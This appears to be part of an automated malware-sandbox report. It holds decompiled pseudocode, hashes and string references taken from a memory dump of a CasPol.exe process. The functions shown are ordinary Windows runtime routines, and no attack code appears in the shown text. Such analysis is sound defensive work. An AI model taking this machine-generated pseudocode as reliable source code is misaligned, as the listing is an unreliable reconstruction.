                                                                  				E0144D0E8(__ebx, __edi, __esi);
                                                                  				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                  				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                  				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                  				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                  				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                  				if(__edx == 0xffffffff) {
                                                                  					L6:
                                                                  					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                  					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                  					__eflags = _t65 & 0x00000002;
                                                                  					if((_t65 & 0x00000002) != 0) {
                                                                  						L3:
                                                                  						L4:
                                                                  						return E0144D130(_t95, _t108, _t109);
                                                                  					}
                                                                  					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                  					_t108 = 0;
                                                                  					_t109 = 0;
                                                                  					_t95 = 0;
                                                                  					__eflags = 0;
                                                                  					while(1) {
                                                                  						__eflags = _t95 - 0x200;
                                                                  						if(_t95 >= 0x200) {
                                                                  							break;
                                                                  						}
                                                                  						E0143D000(0x80);
                                                                  						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                  						_t108 = _t115;
                                                                  						_t95 = _t95 - 0xffffff80;
                                                                  						_t17 = _t114 - 4;
                                                                  						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                  						__eflags =  *_t17;
                                                                  						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                  						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                  						_t102 = _t110 + 1;
                                                                  						do {
                                                                  							_t85 =  *_t110;
                                                                  							_t110 = _t110 + 1;
                                                                  							__eflags = _t85;
                                                                  						} while (_t85 != 0);
                                                                  						_t111 = _t110 - _t102;
                                                                  						_t21 = _t95 - 1; // -129
                                                                  						_t86 = _t21;
                                                                  						__eflags = _t111 - _t86;
                                                                  						if(_t111 > _t86) {
                                                                  							_t111 = _t86;
                                                                  						}
                                                                  						E0143F3E0(_t108, _t106, _t111);
                                                                  						_t115 = _t115 + 0xc;
                                                                  						_t103 = _t111 + _t108;
                                                                  						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                  						_t89 = _t95 - _t111;
                                                                  						__eflags = _t89;
                                                                  						_push(0);
                                                                  						if(_t89 == 0) {
                                                                  							L15:
                                                                  							_t109 = 0xc000000d;
                                                                  							goto L16;
                                                                  						} else {
                                                                  							__eflags = _t89 - 0x7fffffff;
                                                                  							if(_t89 <= 0x7fffffff) {
                                                                  								L16:
                                                                  								 *(_t114 - 0x94) = _t109;
                                                                  								__eflags = _t109;
                                                                  								if(_t109 < 0) {
                                                                  									__eflags = _t89;
                                                                  									if(_t89 != 0) {
                                                                  										 *_t103 = 0;
                                                                  									}
                                                                  									L26:
                                                                  									 *(_t114 - 0xa0) = _t109;
                                                                  									 *(_t114 - 4) = 0xfffffffe;
                                                                  									__eflags = _t109;
                                                                  									if(_t109 >= 0) {
                                                                  										L31:
                                                                  										_t98 = _t108;
                                                                  										_t39 = _t98 + 1; // 0x1
                                                                  										_t106 = _t39;
                                                                  										do {
                                                                  											_t69 =  *_t98;
                                                                  											_t98 = _t98 + 1;
                                                                  											__eflags = _t69;
                                                                  										} while (_t69 != 0);
                                                                  										_t99 = _t98 - _t106;
                                                                  										__eflags = _t99;
                                                                  										L34:
                                                                  										_t70 =  *[fs:0x30];
                                                                  										__eflags =  *((char*)(_t70 + 2));
                                                                  										if( *((char*)(_t70 + 2)) != 0) {
                                                                  											L40:
                                                                  											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                  											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                  											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                  											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                  											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                  											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                  											 *(_t114 - 4) = 1;
                                                                  											_push(_t114 - 0x74);
                                                                  											L0144DEF0(_t99, _t106);
                                                                  											 *(_t114 - 4) = 0xfffffffe;
                                                                  											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                  											goto L3;
                                                                  										}
                                                                  										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                  										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                  											goto L40;
                                                                  										}
                                                                  										_push( *((intOrPtr*)(_t114 + 8)));
                                                                  										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                  										_push(_t99 & 0x0000ffff);
                                                                  										_push(_t108);
                                                                  										_push(1);
                                                                  										_t101 = E0143B280();
                                                                  										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                  										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                  											__eflags = _t101 - 0x80000003;
                                                                  											if(_t101 == 0x80000003) {
                                                                  												L0143B7E0(1);
                                                                  												_t101 = 0;
                                                                  												__eflags = 0;
                                                                  											}
                                                                  										}
                                                                  										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                  										goto L4;
                                                                  									}
                                                                  									__eflags = _t109 - 0x80000005;
                                                                  									if(_t109 == 0x80000005) {
                                                                  										continue;
                                                                  									}
                                                                  									break;
                                                                  								}
                                                                  								 *(_t114 - 0x90) = 0;
                                                                  								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                  								_t91 = E0143E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                  								_t115 = _t115 + 0x10;
                                                                  								_t104 = _t91;
                                                                  								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                  								__eflags = _t104;
                                                                  								if(_t104 < 0) {
                                                                  									L21:
                                                                  									_t109 = 0x80000005;
                                                                  									 *(_t114 - 0x90) = 0x80000005;
                                                                  									L22:
                                                                  									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                  									L23:
                                                                  									 *(_t114 - 0x94) = _t109;
                                                                  									goto L26;
                                                                  								}
                                                                  								__eflags = _t104 - _t92;
                                                                  								if(__eflags > 0) {
                                                                  									goto L21;
                                                                  								}
                                                                  								if(__eflags == 0) {
                                                                  									goto L22;
                                                                  								}
                                                                  								goto L23;
                                                                  							}
                                                                  							goto L15;
                                                                  						}
                                                                  					}
                                                                  					__eflags = _t109;
                                                                  					if(_t109 >= 0) {
                                                                  						goto L31;
                                                                  					}
                                                                  					__eflags = _t109 - 0x80000005;
                                                                  					if(_t109 != 0x80000005) {
                                                                  						goto L31;
                                                                  					}
                                                                  					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                  					_t38 = _t95 - 1; // -129
                                                                  					_t99 = _t38;
                                                                  					goto L34;
                                                                  				}
                                                                  				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                  					__eflags = __edx - 0x65;
                                                                  					if(__edx != 0x65) {
                                                                  						goto L2;
                                                                  					}
                                                                  					goto L6;
                                                                  				}
                                                                  				L2:
                                                                  				_push( *((intOrPtr*)(_t114 + 8)));
                                                                  				_push(_t106);
                                                                  				if(E0143A890() != 0) {
                                                                  					goto L6;
                                                                  				}
                                                                  				goto L3;
                                                                  			}






















                                                                  0x01454959
                                                                  0x01454959
                                                                  0x0145495d
                                                                  0x0145495d
                                                                  0x0145495f
                                                                  0x0145495f
                                                                  0x01454965
                                                                  0x01454969
                                                                  0x014549ba
                                                                  0x014549ba
                                                                  0x014549c1
                                                                  0x014549c5
                                                                  0x014549cc
                                                                  0x014549d4
                                                                  0x014549d7
                                                                  0x014549da
                                                                  0x014549e4
                                                                  0x014549e5
                                                                  0x014549f3
                                                                  0x01454a02
                                                                  0x00000000
                                                                  0x01454a02
                                                                  0x01454972
                                                                  0x01454974
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454976
                                                                  0x01454979
                                                                  0x01454982
                                                                  0x01454983
                                                                  0x01454984
                                                                  0x0145498b
                                                                  0x0145498d
                                                                  0x01454991
                                                                  0x01454993
                                                                  0x01454999
                                                                  0x0145499d
                                                                  0x014549a2
                                                                  0x014549a2
                                                                  0x014549a2
                                                                  0x01454999
                                                                  0x014549ac
                                                                  0x00000000
                                                                  0x014549b3
                                                                  0x014548f8
                                                                  0x014548fe
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014548fe
                                                                  0x01454895
                                                                  0x0145489c
                                                                  0x014548ad
                                                                  0x014548b2
                                                                  0x014548b5
                                                                  0x014548b7
                                                                  0x014548ba
                                                                  0x014548bc
                                                                  0x014548c6
                                                                  0x014548c6
                                                                  0x014548cb
                                                                  0x014548d1
                                                                  0x014548d4
                                                                  0x014548d8
                                                                  0x014548d8
                                                                  0x00000000
                                                                  0x014548d8
                                                                  0x014548be
                                                                  0x014548c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014548c2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014548c4
                                                                  0x00000000
                                                                  0x01454882
                                                                  0x0145487b
                                                                  0x01454904
                                                                  0x01454906
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454908
                                                                  0x0145490e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454910
                                                                  0x01454917
                                                                  0x01454917
                                                                  0x00000000
                                                                  0x01454917
                                                                  0x013fb1ba
                                                                  0x014547f9
                                                                  0x014547fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014547fc
                                                                  0x013fb1c0
                                                                  0x013fb1c0
                                                                  0x013fb1c3
                                                                  0x013fb1cb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: _vswprintf_s
                                                                  • String ID:
                                                                  • API String ID: 677850445-0
                                                                  • Opcode ID: 0b8425f46c3e75c036575fe12c0daf04e4d51e3cd8aa5dfbf0755c28a8dd362d
                                                                  • Instruction ID: 3b899781bb8dadfb3a67ddc757e90dae1a4677ca1f8aad380058c11781d4339a
                                                                  • Opcode Fuzzy Hash: 0b8425f46c3e75c036575fe12c0daf04e4d51e3cd8aa5dfbf0755c28a8dd362d
                                                                  • Instruction Fuzzy Hash: 4151F175D002598FEB71CF78C845BAEBBB0AF04714F1841AEDC59AB3A2E7304985CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 80%
                                                                  			E0142FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                  				char _v5;
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				char _v16;
                                                                  				char _v17;
                                                                  				char _v20;
                                                                  				signed int _v24;
                                                                  				char _v28;
                                                                  				char _v32;
                                                                  				signed int _v40;
                                                                  				void* __ecx;
                                                                  				void* __edi;
                                                                  				void* __ebp;
                                                                  				signed int _t73;
                                                                  				intOrPtr* _t75;
                                                                  				signed int _t77;
                                                                  				signed int _t79;
                                                                  				signed int _t81;
                                                                  				intOrPtr _t83;
                                                                  				intOrPtr _t85;
                                                                  				intOrPtr _t86;
                                                                  				signed int _t91;
                                                                  				signed int _t94;
                                                                  				signed int _t95;
                                                                  				signed int _t96;
                                                                  				signed int _t106;
                                                                  				signed int _t108;
                                                                  				signed int _t114;
                                                                  				signed int _t116;
                                                                  				signed int _t118;
                                                                  				signed int _t122;
                                                                  				signed int _t123;
                                                                  				void* _t129;
                                                                  				signed int _t130;
                                                                  				void* _t132;
                                                                  				intOrPtr* _t134;
                                                                  				signed int _t138;
                                                                  				signed int _t141;
                                                                  				signed int _t147;
                                                                  				intOrPtr _t153;
                                                                  				signed int _t154;
                                                                  				signed int _t155;
                                                                  				signed int _t170;
                                                                  				void* _t174;
                                                                  				signed int _t176;
                                                                  				signed int _t177;
                                                                  
                                                                  				_t129 = __ebx;
                                                                  				_push(_t132);
                                                                  				_push(__esi);
                                                                  				_t174 = _t132;
                                                                  				_t73 =  !( *( *(_t174 + 0x18)));
                                                                  				if(_t73 >= 0) {
                                                                  					L5:
                                                                  					return _t73;
                                                                  				} else {
                                                                  					L0140EEF0(0x14e7b60);
                                                                  					_t134 =  *0x14e7b84; // 0x77e47b80
                                                                  					_t2 = _t174 + 0x24; // 0x24
                                                                  					_t75 = _t2;
                                                                  					if( *_t134 != 0x14e7b80) {
                                                                  						_push(3);
                                                                  						asm("int 0x29");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						asm("int3");
                                                                  						_push(0x14e7b60);
                                                                  						_t170 = _v8;
                                                                  						_v28 = 0;
                                                                  						_v40 = 0;
                                                                  						_v24 = 0;
                                                                  						_v17 = 0;
                                                                  						_v32 = 0;
                                                                  						__eflags = _t170 & 0xffff7cf2;
                                                                  						if((_t170 & 0xffff7cf2) != 0) {
                                                                  							L43:
                                                                  							_t77 = 0xc000000d;
                                                                  						} else {
                                                                  							_t79 = _t170 & 0x0000000c;
                                                                  							__eflags = _t79;
                                                                  							if(_t79 != 0) {
                                                                  								__eflags = _t79 - 0xc;
                                                                  								if(_t79 == 0xc) {
                                                                  									goto L43;
                                                                  								} else {
                                                                  									goto L9;
                                                                  								}
                                                                  							} else {
                                                                  								_t170 = _t170 | 0x00000008;
                                                                  								__eflags = _t170;
                                                                  								L9:
                                                                  								_t81 = _t170 & 0x00000300;
                                                                  								__eflags = _t81 - 0x300;
                                                                  								if(_t81 == 0x300) {
                                                                  									goto L43;
                                                                  								} else {
                                                                  									_t138 = _t170 & 0x00000001;
                                                                  									__eflags = _t138;
                                                                  									_v24 = _t138;
                                                                  									if(_t138 != 0) {
                                                                  										__eflags = _t81;
                                                                  										if(_t81 != 0) {
                                                                  											goto L43;
                                                                  										} else {
                                                                  											goto L11;
                                                                  										}
                                                                  									} else {
                                                                  										L11:
                                                                  										_push(_t129);
                                                                  										_t77 = L01406D90( &_v20);
                                                                  										_t130 = _t77;
                                                                  										__eflags = _t130;
                                                                  										if(_t130 >= 0) {
                                                                  											_push(_t174);
                                                                  											__eflags = _t170 & 0x00000301;
                                                                  											if((_t170 & 0x00000301) == 0) {
                                                                  												_t176 = _a8;
                                                                  												__eflags = _t176;
                                                                  												if(__eflags == 0) {
                                                                  													L64:
                                                                  													_t83 =  *[fs:0x18];
                                                                  													_t177 = 0;
                                                                  													__eflags =  *(_t83 + 0xfb8);
                                                                  													if( *(_t83 + 0xfb8) != 0) {
                                                                  														L014076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                  														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                  													}
                                                                  													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                  													goto L15;
                                                                  												} else {
                                                                  													asm("sbb edx, edx");
                                                                  													_t114 = E01498938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                  													__eflags = _t114;
                                                                  													if(_t114 < 0) {
                                                                  														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                  														E013FB150();
                                                                  													}
                                                                  													_t116 = L01496D81(_t176,  &_v16);
                                                                  													__eflags = _t116;
                                                                  													if(_t116 >= 0) {
                                                                  														__eflags = _v16 - 2;
                                                                  														if(_v16 < 2) {
                                                                  															L56:
                                                                  															_t118 = L014075CE(_v20, 5, 0);
                                                                  															__eflags = _t118;
                                                                  															if(_t118 < 0) {
                                                                  																L67:
                                                                  																_t130 = 0xc0000017;
                                                                  																goto L32;
                                                                  															} else {
                                                                  																__eflags = _v12;
                                                                  																if(_v12 == 0) {
                                                                  																	goto L67;
                                                                  																} else {
                                                                  																	_t153 =  *0x14e8638; // 0x0
                                                                  																	_t122 = L014038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                  																	_t154 = _v12;
                                                                  																	_t130 = _t122;
                                                                  																	__eflags = _t130;
                                                                  																	if(_t130 >= 0) {
                                                                  																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                  																		__eflags = _t123;
                                                                  																		if(_t123 != 0) {
                                                                  																			_t155 = _a12;
                                                                  																			__eflags = _t155;
                                                                  																			if(_t155 != 0) {
                                                                  																				 *_t155 = _t123;
                                                                  																			}
                                                                  																			goto L64;
                                                                  																		} else {
                                                                  																			L014076E2(_t154);
                                                                  																			goto L41;
                                                                  																		}
                                                                  																	} else {
                                                                  																		L014076E2(_t154);
                                                                  																		_t177 = 0;
                                                                  																		goto L18;
                                                                  																	}
                                                                  																}
                                                                  															}
                                                                  														} else {
                                                                  															__eflags =  *_t176;
                                                                  															if( *_t176 != 0) {
                                                                  																goto L56;
                                                                  															} else {
                                                                  																__eflags =  *(_t176 + 2);
                                                                  																if( *(_t176 + 2) == 0) {
                                                                  																	goto L64;
                                                                  																} else {
                                                                  																	goto L56;
                                                                  																}
                                                                  															}
                                                                  														}
                                                                  													} else {
                                                                  														_t130 = 0xc000000d;
                                                                  														goto L32;
                                                                  													}
                                                                  												}
                                                                  												goto L35;
                                                                  											} else {
                                                                  												__eflags = _a8;
                                                                  												if(_a8 != 0) {
                                                                  													_t77 = 0xc000000d;
                                                                  												} else {
                                                                  													_v5 = 1;
                                                                  													L0142FCE3(_v20, _t170);
                                                                  													_t177 = 0;
                                                                  													__eflags = 0;
                                                                  													L15:
                                                                  													_t85 =  *[fs:0x18];
                                                                  													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                  													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                  														L18:
                                                                  														__eflags = _t130;
                                                                  														if(_t130 != 0) {
                                                                  															goto L32;
                                                                  														} else {
                                                                  															__eflags = _v5 - _t130;
                                                                  															if(_v5 == _t130) {
                                                                  																goto L32;
                                                                  															} else {
                                                                  																_t86 =  *[fs:0x18];
                                                                  																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                  																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                  																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                  																}
                                                                  																__eflags = _t177;
                                                                  																if(_t177 == 0) {
                                                                  																	L31:
                                                                  																	__eflags = 0;
                                                                  																	L014070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                  																	goto L32;
                                                                  																} else {
                                                                  																	__eflags = _v24;
                                                                  																	_t91 =  *(_t177 + 0x20);
                                                                  																	if(_v24 != 0) {
                                                                  																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                  																		goto L31;
                                                                  																	} else {
                                                                  																		_t141 = _t91 & 0x00000040;
                                                                  																		__eflags = _t170 & 0x00000100;
                                                                  																		if((_t170 & 0x00000100) == 0) {
                                                                  																			__eflags = _t141;
                                                                  																			if(_t141 == 0) {
                                                                  																				L74:
                                                                  																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                  																				goto L27;
                                                                  																			} else {
                                                                  																				_t177 = L0142FD22(_t177);
                                                                  																				__eflags = _t177;
                                                                  																				if(_t177 == 0) {
                                                                  																					goto L42;
                                                                  																				} else {
                                                                  																					_t130 = L0142FD9B(_t177, 0, 4);
                                                                  																					__eflags = _t130;
                                                                  																					if(_t130 != 0) {
                                                                  																						goto L42;
                                                                  																					} else {
                                                                  																						_t68 = _t177 + 0x20;
                                                                  																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                  																						__eflags =  *_t68;
                                                                  																						_t91 =  *(_t177 + 0x20);
                                                                  																						goto L74;
                                                                  																					}
                                                                  																				}
                                                                  																			}
                                                                  																			goto L35;
                                                                  																		} else {
                                                                  																			__eflags = _t141;
                                                                  																			if(_t141 != 0) {
                                                                  																				_t177 = L0142FD22(_t177);
                                                                  																				__eflags = _t177;
                                                                  																				if(_t177 == 0) {
                                                                  																					L42:
                                                                  																					_t77 = 0xc0000001;
                                                                  																					goto L33;
                                                                  																				} else {
                                                                  																					_t130 = L0142FD9B(_t177, 0, 4);
                                                                  																					__eflags = _t130;
                                                                  																					if(_t130 != 0) {
                                                                  																						goto L42;
                                                                  																					} else {
                                                                  																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                  																						_t91 =  *(_t177 + 0x20);
                                                                  																						goto L26;
                                                                  																					}
                                                                  																				}
                                                                  																				goto L35;
                                                                  																			} else {
                                                                  																				L26:
                                                                  																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                  																				__eflags = _t94;
                                                                  																				L27:
                                                                  																				 *(_t177 + 0x20) = _t94;
                                                                  																				__eflags = _t170 & 0x00008000;
                                                                  																				if((_t170 & 0x00008000) != 0) {
                                                                  																					_t95 = _a12;
                                                                  																					__eflags = _t95;
                                                                  																					if(_t95 != 0) {
                                                                  																						_t96 =  *_t95;
                                                                  																						__eflags = _t96;
                                                                  																						if(_t96 != 0) {
                                                                  																							 *((short*)(_t177 + 0x22)) = 0;
                                                                  																							_t40 = _t177 + 0x20;
                                                                  																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                  																							__eflags =  *_t40;
                                                                  																						}
                                                                  																					}
                                                                  																				}
                                                                  																				goto L31;
                                                                  																			}
                                                                  																		}
                                                                  																	}
                                                                  																}
                                                                  															}
                                                                  														}
                                                                  													} else {
                                                                  														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                  														_t106 =  *(_t147 + 0x20);
                                                                  														__eflags = _t106 & 0x00000040;
                                                                  														if((_t106 & 0x00000040) != 0) {
                                                                  															_t147 = L0142FD22(_t147);
                                                                  															__eflags = _t147;
                                                                  															if(_t147 == 0) {
                                                                  																L41:
                                                                  																_t130 = 0xc0000001;
                                                                  																L32:
                                                                  																_t77 = _t130;
                                                                  																goto L33;
                                                                  															} else {
                                                                  																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                  																_t106 =  *(_t147 + 0x20);
                                                                  																goto L17;
                                                                  															}
                                                                  															goto L35;
                                                                  														} else {
                                                                  															L17:
                                                                  															_t108 = _t106 | 0x00000080;
                                                                  															__eflags = _t108;
                                                                  															 *(_t147 + 0x20) = _t108;
                                                                  															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                  															goto L18;
                                                                  														}
                                                                  													}
                                                                  												}
                                                                  											}
                                                                  											L33:
                                                                  										}
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						L35:
                                                                  						return _t77;
                                                                  					} else {
                                                                  						 *_t75 = 0x14e7b80;
                                                                  						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                  						 *_t134 = _t75;
                                                                  						 *0x14e7b84 = _t75;
                                                                  						_t73 = E0140EB70(_t134, 0x14e7b60);
                                                                  						if( *0x14e7b20 != 0) {
                                                                  							_t73 =  *( *[fs:0x30] + 0xc);
                                                                  							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                  								_t73 = L0140FF60( *0x14e7b20);
                                                                  							}
                                                                  						}
                                                                  						goto L5;
                                                                  					}
                                                                  				}
                                                                  			}
                                                                  0x00000000
                                                                  0x0146bf41
                                                                  0x0146bf41
                                                                  0x0146bf41
                                                                  0x0146bf41
                                                                  0x0146bf45
                                                                  0x00000000
                                                                  0x0146bf45
                                                                  0x0146bf3b
                                                                  0x0146bf26
                                                                  0x00000000
                                                                  0x0142fc47
                                                                  0x0142fc47
                                                                  0x0142fc49
                                                                  0x0142fcb2
                                                                  0x0142fcb4
                                                                  0x0142fcb6
                                                                  0x0142fcdc
                                                                  0x0142fcdc
                                                                  0x00000000
                                                                  0x0142fcb8
                                                                  0x0142fcc3
                                                                  0x0142fcc5
                                                                  0x0142fcc7
                                                                  0x00000000
                                                                  0x0142fcc9
                                                                  0x0142fcc9
                                                                  0x0142fccd
                                                                  0x00000000
                                                                  0x0142fccd
                                                                  0x0142fcc7
                                                                  0x00000000
                                                                  0x0142fc4b
                                                                  0x0142fc4b
                                                                  0x0142fc4e
                                                                  0x0142fc4e
                                                                  0x0142fc51
                                                                  0x0142fc51
                                                                  0x0142fc54
                                                                  0x0142fc5a
                                                                  0x0142fc5c
                                                                  0x0142fc5f
                                                                  0x0142fc61
                                                                  0x0142fc63
                                                                  0x0142fc65
                                                                  0x0142fc67
                                                                  0x0142fc6e
                                                                  0x0142fc72
                                                                  0x0142fc72
                                                                  0x0142fc72
                                                                  0x0142fc72
                                                                  0x0142fc67
                                                                  0x0142fc61
                                                                  0x00000000
                                                                  0x0142fc5a
                                                                  0x0142fc49
                                                                  0x0142fc41
                                                                  0x0142fc30
                                                                  0x0142fc27
                                                                  0x0142fc03
                                                                  0x0142fbcd
                                                                  0x0142fbd3
                                                                  0x0142fbd9
                                                                  0x0142fbdc
                                                                  0x0142fbde
                                                                  0x0142fc99
                                                                  0x0142fc9b
                                                                  0x0142fc9d
                                                                  0x0142fcd5
                                                                  0x0142fcd5
                                                                  0x0142fc89
                                                                  0x0142fc89
                                                                  0x00000000
                                                                  0x0142fc9f
                                                                  0x0142fc9f
                                                                  0x0142fca3
                                                                  0x00000000
                                                                  0x0142fca3
                                                                  0x00000000
                                                                  0x0142fbe4
                                                                  0x0142fbe4
                                                                  0x0142fbe4
                                                                  0x0142fbe4
                                                                  0x0142fbe9
                                                                  0x0142fbf2
                                                                  0x00000000
                                                                  0x0142fbf2
                                                                  0x0142fbde
                                                                  0x0142fbcb
                                                                  0x0142fbab
                                                                  0x0142fc8b
                                                                  0x0142fc8b
                                                                  0x0142fc8c
                                                                  0x0142fb80
                                                                  0x0142fb72
                                                                  0x0142fb5e
                                                                  0x0142fc8d
                                                                  0x0142fc91
                                                                  0x0142fadf
                                                                  0x0142fadf
                                                                  0x0142fae1
                                                                  0x0142fae4
                                                                  0x0142fae7
                                                                  0x0142faec
                                                                  0x0142faf8
                                                                  0x0142fb00
                                                                  0x0142fb07
                                                                  0x0142fb0f
                                                                  0x0142fb0f
                                                                  0x0142fb07
                                                                  0x00000000
                                                                  0x0142faf8
                                                                  0x0142fadd

                                                                  Strings
                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0146BE0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                  • API String ID: 0-865735534
                                                                  • Opcode ID: bf2de46a6aecb13c719af4c9f7883d2e21b2b1b47626b2d370133bae593cf384
                                                                  • Instruction ID: 173cc638212b865c8e3532b36dd47540e4c8d7ac6135d4cc615cadd8cadcb3d5
                                                                  • Opcode Fuzzy Hash: bf2de46a6aecb13c719af4c9f7883d2e21b2b1b47626b2d370133bae593cf384
                                                                  • Instruction Fuzzy Hash: AFA10671B006168BEB26CB6AC45076AB7B8FF54624F84456FD906CB7B1DB30D886CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 75%
                                                                  			E0142F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                  				intOrPtr _v8;
                                                                  				intOrPtr _v12;
                                                                  				intOrPtr _v16;
                                                                  				char* _v20;
                                                                  				intOrPtr _v24;
                                                                  				char _v28;
                                                                  				intOrPtr _v32;
                                                                  				char _v36;
                                                                  				char _v44;
                                                                  				char _v52;
                                                                  				intOrPtr _v56;
                                                                  				char _v60;
                                                                  				intOrPtr _v72;
                                                                  				void* _t51;
                                                                  				void* _t58;
                                                                  				signed short _t82;
                                                                  				short _t84;
                                                                  				signed int _t91;
                                                                  				signed int _t100;
                                                                  				signed short* _t103;
                                                                  				void* _t108;
                                                                  				intOrPtr* _t109;
                                                                  
                                                                  				_t103 = __ecx;
                                                                  				_t82 = __edx;
                                                                  				_t51 = E01414120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                  				if(_t51 >= 0) {
                                                                  					_push(0x21);
                                                                  					_push(3);
                                                                  					_v56 =  *0x7ffe02dc;
                                                                  					_v20 =  &_v52;
                                                                  					_push( &_v44);
                                                                  					_v28 = 0x18;
                                                                  					_push( &_v28);
                                                                  					_push(0x100020);
                                                                  					_v24 = 0;
                                                                  					_push( &_v60);
                                                                  					_v16 = 0x40;
                                                                  					_v12 = 0;
                                                                  					_v8 = 0;
